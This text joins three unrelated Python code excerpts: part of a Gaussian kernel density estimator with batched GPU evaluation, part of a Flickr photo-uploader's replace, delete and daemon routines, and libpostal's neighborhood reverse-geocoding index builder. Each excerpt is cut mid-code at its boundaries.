weights = weights.astype(dtype)
self.dataset = self.dataset.astype(dtype)
self._weights = weights
self._covariance_factor = \
self._get_covariance_factor_function_from_bandwidth_type(bw_method)
self._compute_covariance()
def _check_and_adjust_dimensions_of_points(self, points: np.ndarray) \
-> np.ndarray:
points = atleast_2d(asarray(points))
d, m = points.shape
if d != self.d:
if d == 1 and m == self.d:
# points was passed in as a row vector
points = reshape(points, (self.d, 1))
m = 1
else:
raise ValueError(f"points have dimension {d}, "
f"dataset has dimension {self.d}")
return points
def evaluate(self, points):
"""
Evaluate the estimated pdf on a set of points.
Parameters
----------
points : (# of dimensions, # of points)-array
Alternatively, a (# of dimensions,) vector can be passed in and
treated as a single point.
Returns
-------
values : (# of points,)-array
The values at each point.
Raises
------
ValueError : if the dimensionality of the input points is different than
the dimensionality of the KDE.
"""
points = self._check_and_adjust_dimensions_of_points(points)
output_dtype = np.common_type(self.covariance, points)
if True:
# result = gaussian_kernel_estimate_vectorized(points=self.dataset.T,
# values=self.weights[:, None],
# xi=points.T,
# precision=self.inv_cov,
# dtype=output_dtype,
# gpu=self._gpu)
result = gaussian_kernel_estimate_vectorized_whitened(
whitening=self.whitening,
whitened_points=self.whitened_points,
values=self.weights[:, None],
xi=points.T,
norm=self.normalization_constant,
dtype=output_dtype,
gpu=self._gpu)
return result
else:
result = gaussian_kernel_estimate(points=self.dataset.T,
values=self.weights[:, None],
xi=points.T,
precision=self.inv_cov,
dtype=output_dtype)
return result[:, 0]
__call__ = evaluate
def evaluate_in_batches(self,
points: NumericArray,
maximum_number_of_elements_per_batch: int) \
-> np.ndarray:
"""
Evaluates a Gaussian KDE in batches and stores the results in main memory.
Args:
points:
numeric array with shape (d, m) containing the points at which to evaluate the kernel
density estimate
maximum_number_of_elements_per_batch:
maximum number of data points times evaluation points to process in a single batch
Returns:
a m-dimensional NumPy array of kernel density estimates
"""
points_per_batch = math.floor(maximum_number_of_elements_per_batch / (self.n * self.d))
args_list = _split_points_into_batches(points, points_per_batch)
result = \
map_combine_single_device(f=self.evaluate,
combination=lambda x: np.hstack(x),
args_list=args_list)
return result
def evaluate_in_batches_on_multiple_devices(self,
points: NumericArray,
maximum_number_of_elements_per_batch: int,
compute_device_pool: ComputeDevicePool) \
-> np.ndarray:
"""
Evaluates a Gaussian KDE in batches on multiple gpus and stores the results | |
calling replace_photo
if file_checksum is None:
file_checksum = faw.md5checksum(file)
if file_checksum != str(row[4]):
self.replace_photo(lock, file, row[1], row[4],
file_checksum, last_modified,
cur, con)
# Closing DB connection
litedb.close(con)
return success
# -------------------------------------------------------------------------
# replace_photo
# Should be only called from upload_file
#
# lock = parameter for multiprocessing control of access to DB
# (if self.args.processes = 0 then lock can be None
# as it is not used)
# file = file to be uploaded to replace existing file
# file_id = ID of the photo being replaced
# oldfile_md5 = Old file MD5 (required to update checksum tag
# on Flikr)
# file_md5 = New file MD5
# last_modified = date/time last modification of the file to update
# database
# cur = current cursor for updating Database
# con = current DB connection
#
def replace_photo(self, lock, file, file_id,
oldfile_md5, file_md5, last_modified, cur, con):
""" replace_photo
lock = parameter for multiprocessing control of access to DB
(if self.args.processes = 0 then lock can be None
as it is not used)
file = file to be uploaded to replace existing file
file_id = ID of the photo being replaced
oldfile_md5 = Old file MD5 (required to update checksum tag
on Flikr)
file_md5 = New file MD5
last_modified = date/time last modification of the file to update
database
cur = current cursor for updating Database
con = current DB connection
"""
if self.args.dry_run:
NP.niceprint('Dry Run Replace:[{!s}]...'
.format(NP.strunicodeout(file)))
return True
NP.niceprint(' Replacing file:[{!s}]'.format(NP.strunicodeout(file)),
verbosity=1)
success = False
try:
# nuflickr.replace accepts both a filename and a file object.
# when using filenames with unicode characters
# - the flickrapi seems to fail with filename
# so I've used photo FileObj and filename='dummy'
photo = open(file.encode('utf-8'), 'rb')\
if NP.is_str_unicode(file)\
else open(file, 'rb')
logging.debug('photo:[%s] type(photo):[%s]', photo, type(photo))
attempts = None
for attempts in range(0, self.xcfg.MAX_UPLOAD_ATTEMPTS):
res_add_tag = None
res_get_info = None
replace_resp = None
try:
if attempts > 0:
NP.niceprint(' Re-Replacing:'
'[{!s}]...[{!s}/{!s} attempts].'
.format(NP.strunicodeout(file),
attempts,
self.xcfg.MAX_UPLOAD_ATTEMPTS),
verbosity=1)
# Use fileobj with filename='dummy'to accept unicode file.
replace_resp = self.nuflickr.replace(
filename='dummy',
fileobj=photo,
# fileobj=faw.FileWithCallback(
# file, faw.callback, self.args.verbose_progress),
photo_id=file_id
)
logging.debug('Output for replace_resp: %s',
xml.etree.ElementTree.tostring(
replace_resp,
encoding='utf-8',
method='xml'))
logging.info('replace_resp:[%s]',
faw.is_good(replace_resp))
if faw.is_good(replace_resp):
# Add checksum tag with new md5
get_success, res_add_tag, get_errcode = \
faw.flickrapi_fn(
self.nuflickr.photos.addTags, (),
dict(photo_id=file_id,
tags='checksum:{}'.format(file_md5)),
2, 2, False, caughtcode='055')
if get_success and get_errcode == 0:
# Gets Flickr file info to obtain all tags
# in order to delete checksum tag of old md5
gi_success, res_get_info, gi_errcode = \
faw.flickrapi_fn(
self.nuflickr.photos.getInfo, (),
dict(photo_id=file_id),
2, 2, False, caughtcode='056')
if gi_success and gi_errcode == 0:
# find tag checksum with old md5 to delete it
tag_id = None
for tag in res_get_info\
.find('photo')\
.find('tags')\
.findall('tag'):
if (tag.attrib['raw'] ==
'checksum:{}'.format(oldfile_md5)):
tag_id = tag.attrib['id']
logging.info(' Found tag_id:[%s]',
tag_id)
break
if not tag_id:
NP.niceprint(' Can\'t find tag:[{!s}]'
'for file [{!s}]'
.format(tag_id, file_id))
# break from attempting to update tag_id
break
else:
# delete tag_id with old Md5
logging.info('Removing tag_id:[%s]',
tag_id)
if self.photos_remove_tag(tag_id):
NP.niceprint(
' Tag removed:[{!s}]'
.format(NP.strunicodeout(file)))
else:
NP.niceprint(
'Tag Not removed:[{!s}]'
.format(NP.strunicodeout(file)))
break
# Exceptions for flickr.upload function call handled on the
# outer try/except.
except (IOError, ValueError, httplib.HTTPException):
NP.niceerror(caught=True,
caughtprefix='+++',
caughtcode='060',
caughtmsg='Caught IOError, ValueError, '
'HTTP exception',
useniceprint=True,
exceptsysinfo=True)
NP.niceerror(caught=True,
caughtprefix='xxx',
caughtcode='061',
caughtmsg='Sleep {!s} and try replacing again'
.format(UPLDR_K.upload_sleep),
useniceprint=True)
NUTIME.sleep(UPLDR_K.upload_sleep)
if attempts == self.xcfg.MAX_UPLOAD_ATTEMPTS - 1:
raise ValueError('Reached maximum number of attempts '
'to replace, skipping')
continue
if (not faw.is_good(replace_resp)) or \
(not faw.is_good(res_add_tag)) or \
(not faw.is_good(res_get_info)):
NP.niceprint('Issue replacing:[{!s}]'
.format(NP.strunicodeout(file)),
logalso=logging.ERROR)
if not faw.is_good(replace_resp):
raise IOError(replace_resp)
if not faw.is_good(res_add_tag):
raise IOError(res_add_tag)
if not faw.is_good(res_get_info):
raise IOError(res_get_info)
NP.niceprint(' Replaced file:[{!s}]'
.format(NP.strunicodeout(file)),
logalso=logging.WARNING)
# Update the db the file uploaded
# Control for when running multiprocessing set locking
litedb.execute(con,
'UPDATE#055',
lock, self.args.processes,
cur,
'UPDATE files SET md5 = ?,last_modified = ? '
'WHERE files_id = ?',
qmarkargs=(file_md5, last_modified, file_id),
dbcaughtcode='055')
# Update the Video Date Taken
self.update_video_date(file_id, file, last_modified)
success = True
except flickrapi.exceptions.FlickrError as ex:
NP.niceerror(caught=True,
caughtprefix='+++',
caughtcode='080',
caughtmsg='Flickrapi exception on upload(or)replace',
exceptuse=True,
exceptcode=ex.code,
exceptmsg=ex,
useniceprint=True,
exceptsysinfo=True)
# Error: 8: Videos can't be replaced
if ex.code == 8:
NP.niceprint('..Video replace:[{!s}] Delete/uploading...'
.format(NP.strunicodeout(file)),
fname='replace',
logalso=logging.ERROR)
xrow = [file_id, file]
logging.debug('delete/uploading '
'xrow[0].files_id=[%s]'
'xrow[1].file=[%s]',
xrow[0], NP.strunicodeout(xrow[1]))
if self.delete_file(xrow, lock):
NP.niceprint('..Video deleted:[{!s}] for replace!'
.format(NP.strunicodeout(file)),
fname='replace',
logalso=logging.WARNING)
if self.upload_file(lock, file):
NP.niceprint('.Video replaced:[{!s}]'
.format(NP.strunicodeout(file)),
fname='replace',
logalso=logging.WARNING)
else:
NP.niceprint('..Failed upload:[{!s}] for replace!'
.format(NP.strunicodeout(file)),
fname='replace',
logalso=logging.ERROR)
else:
NP.niceprint('..Failed delete:[{!s}] for replace!'
.format(NP.strunicodeout(file)),
fname='replace',
logalso=logging.ERROR)
except lite.Error as err:
NP.niceerror(caught=True,
caughtprefix='+++ DB',
caughtcode='081',
caughtmsg='DB error: [{!s}]'.format(err.args[0]),
useniceprint=True)
# Release the lock on error.
mp.use_lock(lock, False, self.args.processes)
success = False
except Exception:
NP.niceerror(caught=True,
caughtprefix='+++',
caughtcode='082',
caughtmsg='Caught exception in replace_photo',
exceptsysinfo=True)
success = False
return success
# -------------------------------------------------------------------------
# deletefile
#
# Delete files from flickr
#
# When EXCLUDED_FOLDERS defintion changes. You can run the -g
# or --remove-excluded option in order to remove files previously loaded
#
def delete_file(self, file, lock=None):
""" delete_file
delete file from flickr
file = row of database with (files_id, path)
cur = represents the control database cursor to allow, for example,
deleting empty sets
lock = for use with use_lock to control access to DB
"""
# ---------------------------------------------------------------------
# delete_record_localdb
#
def delete_record_localdb(lock, file):
""" delete_record_localdb
Find out if the file is the last item in a set, if so,
remove the set from the local db
lock = for use with use_lock to control access to DB
file = row of database with (files_id, path)
Use new connection and nucur cursor to ensure commit
"""
con, nucur = litedb.connect(self.xcfg.DB_PATH)
litedb.execute(con,
'SELECT#058:delete_record_localdb',
lock, self.args.processes,
nucur,
'SELECT set_id FROM files WHERE files_id = ?',
qmarkargs=(file[0],),
dbcaughtcode='058')
row = nucur.fetchone()
if row is not None:
litedb.execute(con,
'SELECT#061:delete_record_localdb',
lock, self.args.processes,
nucur,
'SELECT set_id FROM files WHERE set_id = ?',
qmarkargs=(row[0],),
dbcaughtcode='061')
rows = nucur.fetchall()
if len(rows) == 1:
NP.niceprint('File is the last of the set, '
'deleting the set ID: [{!s}]'
.format(str(row[0])))
litedb.execute(
con, 'DELETE#062:delete_record_localdb',
lock, self.args.processes,
nucur,
'DELETE FROM sets WHERE set_id = ?',
qmarkargs=(row[0],),
dbcaughtcode='062')
litedb.execute(
con, 'DELETE#063:delete_record_localdb',
lock, self.args.processes,
nucur,
'DELETE FROM files WHERE files_id = ?',
qmarkargs=(file[0],),
dbcaughtcode='063')
litedb.close(con)
# ---------------------------------------------------------------------
if self.args.dry_run:
NP.niceprint('Dry Run Deleting file:[{!s}]'
.format(NP.strunicodeout(file[1])))
return True
NP.niceprint(' Deleting file:[{!s}]'
.format(NP.strunicodeout(file[1])),
logalso=logging.WARNING)
# Cater for option --no-delete-from-flickr
if not self.args.no_delete_from_flickr:
get_success, _, get_errcode = faw.flickrapi_fn(
self.nuflickr.photos.delete, (),
dict(photo_id=str(file[0])),
2, 2, False, caughtcode='111')
else:
logging.info('no_delete_from_flickr option is enabled:[%s]',
self.args.no_delete_from_flickr)
get_success, _, get_errcode = faw.flickrapi_fn(
self.nuflickr.photos.addTags, (),
dict(photo_id=str(file[0]),
tags='{}'.format(self.args.no_delete_from_flickr)),
2, 2, False, caughtcode='112')
success = False
if ((get_success and get_errcode == 0) or
(not get_success and get_errcode == 1)):
# Error: 1: File already removed from Flickr
delete_record_localdb(lock, file)
NP.niceprint(' Deleted file:[{!s}]'
.format(NP.strunicodeout(file[1])),
logalso=logging.WARNING)
success = True
else:
NP.niceerror(caught=True,
caughtprefix='xxx',
caughtcode='115',
caughtmsg='Failed to delete photo (delete_file)',
useniceprint=True)
return success
# -------------------------------------------------------------------------
# log_set_creation
#
# Creates on flickrdb local database a SetName(Album)
#
def log_set_creation(self, lock,
set_id, setname,
primary_photo_id,
cur, con):
""" log_set_creation
Creates on flickrdb local database a SetName(Album)
with Primary photo Id.
Assigns Primary photo Id to set on the local DB.
Also updates photo DB entry with its set_id
"""
NP.niceprint(' Add set to DB:[{!s}]'
.format(NP.strunicodeout(setname)),
verbosity=1, logalso=logging.WARNING)
if litedb.execute(con, 'INSERT#094', lock, self.args.processes,
cur,
'INSERT INTO sets (set_id, name, primary_photo_id) '
'VALUES (?,?,?)',
qmarkargs=(set_id, setname, primary_photo_id),
dbcaughtcode='094'):
litedb.execute(con, 'UPDATE#095', lock, self.args.processes,
cur,
'UPDATE files SET set_id = ? WHERE files_id = ?',
qmarkargs=(set_id, primary_photo_id),
dbcaughtcode='095')
return True
# -------------------------------------------------------------------------
# run
#
# run in daemon mode. runs upload every SLEEP_TIME
#
def run(self):
""" run
Run in daemon mode. runs upload every SLEEP_TIME seconds.
"""
NP.niceprint('Daemon mode run.',
logalso=logging.WARNING)
while True:
NP.niceprint(' Daemon mode go:[{!s}]'
.format(NUTIME.strftime(
UPLDR_K.TimeFormat)))
# run upload
self.upload()
NP.niceprint('Daemon mode out:[{!s}]'
.format(str(NUTIME.asctime(time.localtime()))))
NP.niceprint(' Daemon wait:[{!s}] seconds.'
.format(self.xcfg.SLEEP_TIME),
logalso=logging.WARNING)
NUTIME.sleep(self.xcfg.SLEEP_TIME)
# ---------------------------------------------------------------------
# fn_add_filestosets
#
# Processing function for adding files to set in multiprocessing mode
#
def fn_add_filestosets(self, lockdb, running, mutex, sfiles, c_total, cur):
""" fn_add_filestosets
"""
# CODING pylint
# pylint: disable=unused-argument
# CODING Use a | |
<filename>scripts/geodata/neighborhoods/reverse_geocode.py
# -*- coding: utf-8 -*-
import argparse
import logging
import operator
import os
import re
import six
import subprocess
import sys
import yaml
this_dir = os.path.realpath(os.path.dirname(__file__))
sys.path.append(os.path.realpath(os.path.join(os.pardir, os.pardir)))
from geodata.address_formatting.formatter import AddressFormatter
from geodata.coordinates.conversion import latlon_to_decimal
from geodata.encoding import safe_decode
from geodata.file_utils import ensure_dir, download_file
from geodata.i18n.unicode_properties import get_chars_by_script
from geodata.i18n.word_breaks import ideographic_scripts
from geodata.names.deduping import NameDeduper
from geodata.osm.admin_boundaries import OSMNeighborhoodPolygonReader
from geodata.osm.components import osm_address_components
from geodata.osm.definitions import osm_definitions
from geodata.osm.extract import parse_osm, osm_type_and_id, NODE, WAY, RELATION, OSM_NAME_TAGS
from geodata.polygons.index import *
from geodata.polygons.reverse_geocode import QuattroshapesReverseGeocoder, OSMCountryReverseGeocoder, OSMReverseGeocoder
from geodata.statistics.tf_idf import IDFIndex
class NeighborhoodDeduper(NameDeduper):
# Lossless conversions only
replacements = {
u'saint': u'st',
u'and': u'&',
u'〇': u'0',
u'一': u'1',
u'二': u'2',
u'三': u'3',
u'四': u'4',
u'五': u'5',
u'六': u'6',
u'七': u'7',
u'八': u'8',
u'九': u'9',
u'十': u'10',
}
discriminative_words = set([
# Han numbers
u'〇', u'一',
u'二', u'三',
u'四', u'五',
u'六', u'七',
u'八', u'九',
u'十', u'百',
u'千', u'万',
u'億', u'兆',
u'京', u'第',
# Roman numerals
u'i', u'ii',
u'iii', u'iv',
u'v', u'vi',
u'vii', u'viii',
u'ix', u'x',
u'xi', u'xii',
u'xiii', u'xiv',
u'xv', u'xvi',
u'xvii', u'xviii',
u'xix', u'xx',
# English directionals
u'north', u'south',
u'east', u'west',
u'northeast', u'northwest',
u'southeast', u'southwest',
# Spanish, Portguese and Italian directionals
u'norte', u'nord', u'sur', u'sul', u'sud',
u'est', u'este', u'leste', u'oeste', u'ovest',
# New in various languages
u'new',
u'nova',
u'novo',
u'nuevo',
u'nueva',
u'nuovo',
u'nuova',
# Qualifiers
u'heights',
u'hills',
u'upper', u'lower',
u'little', u'great',
u'park',
u'parque',
u'village',
])
stopwords = set([
u'cp',
u'de',
u'la',
u'urbanizacion',
u'do',
u'da',
u'dos',
u'del',
u'community',
u'bairro',
u'barrio',
u'le',
u'el',
u'mah',
u'раион',
u'vila',
u'villa',
u'kampung',
u'ahupua`a',
])
class ClickThatHoodReverseGeocoder(GeohashPolygonIndex):
persistent_polygons = False
cache_size = 0
SCRATCH_DIR = '/tmp'
# Contains accurate boundaries for neighborhoods sans weird GeoPlanet names like "Adelphi" or "Crown Heights South"
NEIGHBORHOODS_REPO = 'https://github.com/codeforamerica/click_that_hood'
config_path = os.path.join(this_dir, os.pardir, os.pardir, os.pardir,
'resources', 'neighborhoods', 'click_that_hood.yaml')
config = yaml.load(open(config_path))
@classmethod
def clone_repo(cls, path):
subprocess.check_call(['rm', '-rf', path])
subprocess.check_call(['git', 'clone', cls.NEIGHBORHOODS_REPO, path])
@classmethod
def create_neighborhoods_index(cls):
scratch_dir = cls.SCRATCH_DIR
repo_path = os.path.join(scratch_dir, 'click_that_hood')
cls.clone_repo(repo_path)
data_path = os.path.join(repo_path, 'public', 'data')
neighborhoods_dir = os.path.join(scratch_dir, 'neighborhoods')
ensure_dir(neighborhoods_dir)
index = cls(save_dir=neighborhoods_dir)
for c in cls.config['files']:
filename = c['filename']
component = c['component']
path = os.path.join(data_path, filename)
features = json.load(open(path))['features']
for f in features:
f['properties']['component'] = component
try:
index.add_geojson_like_file(features)
except ValueError:
continue
return index
class OSMNeighborhoodReverseGeocoder(OSMReverseGeocoder):
persistent_polygons = False
cache_size = 10000
simplify_polygons = False
polygon_reader = OSMNeighborhoodPolygonReader
include_property_patterns = OSMReverseGeocoder.include_property_patterns | set(['postal_code'])
cache_size = 0
SCRATCH_DIR = '/tmp'
@classmethod
def create_neighborhoods_index(cls, osm_neighborhoods_file):
scratch_dir = cls.SCRATCH_DIR
neighborhoods_dir = os.path.join(scratch_dir, 'neighborhoods', 'index')
ensure_dir(neighborhoods_dir)
return cls.create_from_osm_file(osm_neighborhoods_file, output_dir=neighborhoods_dir)
class NeighborhoodReverseGeocoder(RTreePolygonIndex):
'''
Neighborhoods are very important in cities like NYC, SF, Chicago, London
and many others. We want the address parser to be trained with addresses
that sufficiently capture variations in address patterns, including
neighborhoods. Quattroshapes neighborhood data (in the US at least)
is not great in terms of names, mostly becasue GeoPlanet has so many
incorrect names. The neighborhoods project, also known as ClickThatHood
has very accurate polygons with correct names, but only for a handful
of cities. OSM usually lists neighborhoods and some other local admin
areas like boroughs as points rather than polygons.
This index merges all of the above data sets in prioritized order
(ClickThatHood > OSM > Quattroshapes) to provide unified point-in-polygon
tests for neighborhoods. The properties vary by source but each has
source has least a "name" key which in practice is what we care about.
'''
PRIORITIES_FILENAME = 'priorities.json'
DUPE_THRESHOLD = 0.9
persistent_polygons = True
cache_size = 100000
source_priorities = {
'osm': 0, # Best names/polygons, same coordinate system
'osm_cth': 1, # Prefer the OSM names if possible
'clickthathood': 2, # Better names/polygons than Quattroshapes
'osm_quattro': 3, # Prefer OSM names matched with Quattroshapes polygon
'quattroshapes': 4, # Good results in some countries/areas
}
level_priorities = {
'neighborhood': 0,
'local_admin': 1,
}
regex_replacements = [
# Paris arrondissements, listed like "PARIS-1ER-ARRONDISSEMENT" in Quqttroshapes
(re.compile('^paris-(?=[\d])', re.I), ''),
(re.compile('^prague(?= [\d]+$)', re.I), 'Praha'),
]
quattroshapes_city_district_patterns = [
six.u('Praha [\d]+'),
]
quattroshapes_city_district_regex = re.compile('|'.join([six.u('^\s*{}\s*$').format(p) for p in quattroshapes_city_district_patterns]), re.I | re.U)
@classmethod
def count_words(cls, s):
doc = defaultdict(int)
for t, c in NeighborhoodDeduper.content_tokens(s):
doc[t] += 1
return doc
@classmethod
def create_from_osm_and_quattroshapes(cls, filename, quattroshapes_dir, country_rtree_dir, osm_rtree_dir, osm_neighborhood_borders_file, output_dir):
'''
Given an OSM file (planet or some other bounds) containing neighborhoods
as points (some suburbs have boundaries)
and their dependencies, create an R-tree index for coarse-grained
reverse geocoding.
Note: the input file is expected to have been created using
osmfilter. Use fetch_osm_address_data.sh for planet or copy the
admin borders commands if using other geometries.
'''
index = cls(save_dir=output_dir)
logger = logging.getLogger('neighborhoods')
qs_scratch_dir = os.path.join(quattroshapes_dir, 'qs_neighborhoods')
ensure_dir(qs_scratch_dir)
logger.info('Creating ClickThatHood neighborhoods')
cth = ClickThatHoodReverseGeocoder.create_neighborhoods_index()
logger.info('Creating OSM neighborhoods')
osmn = OSMNeighborhoodReverseGeocoder.create_neighborhoods_index(osm_neighborhood_borders_file)
logger.info('Creating Quattroshapes neighborhoods')
qs = QuattroshapesNeighborhoodsReverseGeocoder.create_neighborhoods_index(quattroshapes_dir, qs_scratch_dir)
country_rtree = OSMCountryReverseGeocoder.load(country_rtree_dir)
osm_admin_rtree = OSMReverseGeocoder.load(osm_rtree_dir)
osm_admin_rtree.cache_size = 1000
logger.info('Creating IDF index')
idf = IDFIndex()
char_scripts = get_chars_by_script()
for idx in (cth, qs, osmn):
for i in xrange(idx.i):
props = idx.get_properties(i)
name = props.get('name')
if name is not None:
doc = cls.count_words(name)
idf.update(doc)
for key, attrs, deps in parse_osm(filename):
for k, v in six.iteritems(attrs):
if any((k.startswith(name_key) for name_key in OSM_NAME_TAGS)):
doc = cls.count_words(v)
idf.update(doc)
for i in six.moves.xrange(osmn.i):
props = osmn.get_properties(i)
poly = osmn.get_polygon(i)
props['source'] = 'osm'
props['component'] = AddressFormatter.SUBURB
props['polygon_type'] = 'neighborhood'
index.index_polygon(poly.context)
index.add_polygon(poly.context, props)
qs.matched = [False] * qs.i
cth.matched = [False] * cth.i
logger.info('Matching OSM points to neighborhood polygons')
# Parse OSM and match neighborhood/suburb points to Quattroshapes/ClickThatHood polygons
num_polys = 0
for element_id, attrs, deps in parse_osm(filename):
try:
lat, lon = latlon_to_decimal(attrs['lat'], attrs['lon'])
except ValueError:
continue
osm_name = attrs.get('name')
if not osm_name:
continue
id_type, element_id = element_id.split(':')
element_id = long(element_id)
props['type'] = id_type
props['id'] = element_id
possible_neighborhood = osm_definitions.meets_definition(attrs, osm_definitions.EXTENDED_NEIGHBORHOOD)
is_neighborhood = osm_definitions.meets_definition(attrs, osm_definitions.NEIGHBORHOOD)
country, candidate_languages = country_rtree.country_and_languages(lat, lon)
component_name = None
component_name = osm_address_components.component_from_properties(country, attrs)
ranks = []
osm_names = []
for key in OSM_NAME_TAGS:
name = attrs.get(key)
if name:
osm_names.append(name)
for name_key in OSM_NAME_TAGS:
osm_names.extend([v for k, v in six.iteritems(attrs) if k.startswith('{}:'.format(name_key))])
for idx in (cth, qs):
candidates = idx.get_candidate_polygons(lat, lon, return_all=True)
if candidates:
max_sim = 0.0
arg_max = None
normalized_qs_names = {}
for osm_name in osm_names:
contains_ideographs = any(((char_scripts[ord(c)] or '').lower() in ideographic_scripts
for c in safe_decode(osm_name)))
for i in candidates:
props = idx.get_properties(i)
name = normalized_qs_names.get(i)
if not name:
name = props.get('name')
if not name:
continue
for pattern, repl in cls.regex_replacements:
name = pattern.sub(repl, name)
normalized_qs_names[i] = name
if is_neighborhood and idx is qs and props.get(QuattroshapesReverseGeocoder.LEVEL) != 'neighborhood':
continue
if not contains_ideographs:
sim = NeighborhoodDeduper.compare(osm_name, name, idf)
else:
# Many Han/Hangul characters are common, shouldn't use IDF
sim = NeighborhoodDeduper.compare_ideographs(osm_name, name)
if sim > max_sim:
max_sim = sim
poly = idx.get_polygon(i)
arg_max = (max_sim, props, poly.context, idx, i)
if arg_max:
ranks.append(arg_max)
ranks.sort(key=operator.itemgetter(0), reverse=True)
if ranks and ranks[0][0] >= cls.DUPE_THRESHOLD:
score, props, poly, idx, i = ranks[0]
existing_osm_boundaries = osm_admin_rtree.point_in_poly(lat, lon, return_all=True)
existing_neighborhood_boundaries = osmn.point_in_poly(lat, lon, return_all=True)
skip_node = False
for boundaries in (existing_osm_boundaries, existing_neighborhood_boundaries):
for poly_index, osm_props in enumerate(boundaries):
containing_component = None
name = osm_props.get('name')
# Only exact name matches here since we're comparins OSM to OSM
if name and name.lower() != attrs.get('name', '').lower():
continue
if boundaries is existing_neighborhood_boundaries:
containing_component = AddressFormatter.SUBURB
skip_node = True
break
else:
containing_ids = [(boundary['type'], boundary['id']) for boundary in existing_osm_boundaries[poly_index + 1:]]
containing_component = osm_address_components.component_from_properties(country, osm_props, containing=containing_ids)
if containing_component and containing_component != component_name and AddressFormatter.component_order[containing_component] <= AddressFormatter.component_order[AddressFormatter.CITY]:
skip_node = True
break
if skip_node:
break
# Skip this element
if skip_node:
continue
if idx is cth:
if props['component'] == AddressFormatter.SUBURB:
attrs['polygon_type'] = 'neighborhood'
elif props['component'] == AddressFormatter.CITY_DISTRICT:
attrs['polygon_type'] = 'local_admin'
else:
continue
source = 'osm_cth'
else:
level = props.get(QuattroshapesReverseGeocoder.LEVEL, None)
source = 'osm_quattro'
if level == 'neighborhood':
attrs['polygon_type'] = 'neighborhood'
else:
attrs['polygon_type'] = 'local_admin'
containing_ids = [(boundary['type'], boundary['id']) for boundary in existing_osm_boundaries]
component = osm_address_components.component_from_properties(country, attrs, containing=containing_ids)
attrs['component'] = component
attrs['source'] = source
index.index_polygon(poly)
index.add_polygon(poly, attrs)
idx.matched[i] = True
num_polys += 1
if num_polys % 1000 == 0 and num_polys > 0:
logger.info('did {} neighborhoods'.format(num_polys))
for idx, source in ((cth, 'clickthathood'), (qs, 'quattroshapes')):
for i in xrange(idx.i):
props = idx.get_properties(i)
poly = idx.get_polygon(i)
if idx.matched[i]:
continue
props['source'] = source
if idx is cth:
component = props['component']
if component == AddressFormatter.SUBURB:
props['polygon_type'] = |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.